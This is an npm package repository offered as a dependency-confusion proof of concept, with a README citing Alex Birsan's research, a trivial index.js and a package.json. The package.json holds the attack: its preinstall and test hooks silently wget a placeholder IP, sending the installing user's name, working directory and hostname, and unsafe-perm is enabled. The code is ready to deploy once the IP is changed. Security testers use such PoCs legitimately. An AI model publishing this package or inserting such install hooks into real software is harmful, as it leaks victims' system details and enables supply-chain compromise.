├── README.md
├── index.js
└── package.json


/README.md:
--------------------------------------------------------------------------------
1 | # NPM Dependency Confusion PoC
2 | Simple PoC package for testing for dependency confusion vulnerabilities. 
3 | 
4 | Inspired by Alex Birsan's research. 
5 | 
6 | Reference: [https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610](https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610)
7 | 


--------------------------------------------------------------------------------
/index.js:
--------------------------------------------------------------------------------
1 | exports.printMsg = function() {
2 |   console.log("This is a message from the demo package");
3 | }
4 | 


--------------------------------------------------------------------------------
/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "dependency-confusion-poc",
 3 |   "version": "1.0.0",
 4 |   "description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "wget --quiet \"http://8.8.8.8/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
 8 |     "preinstall": "wget --quiet \"http://8.8.8.8/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
 9 |   },
10 |   "keywords": [
11 |     "test",
12 |     "PoC"
13 |   ],
14 |   "dependencies": {},
15 |   "config": {
16 |     "unsafe-perm":true
17 |   },
18 |   "author": "WayCup",
19 |   "license": "ISC"
20 | }
21 | 


--------------------------------------------------------------------------------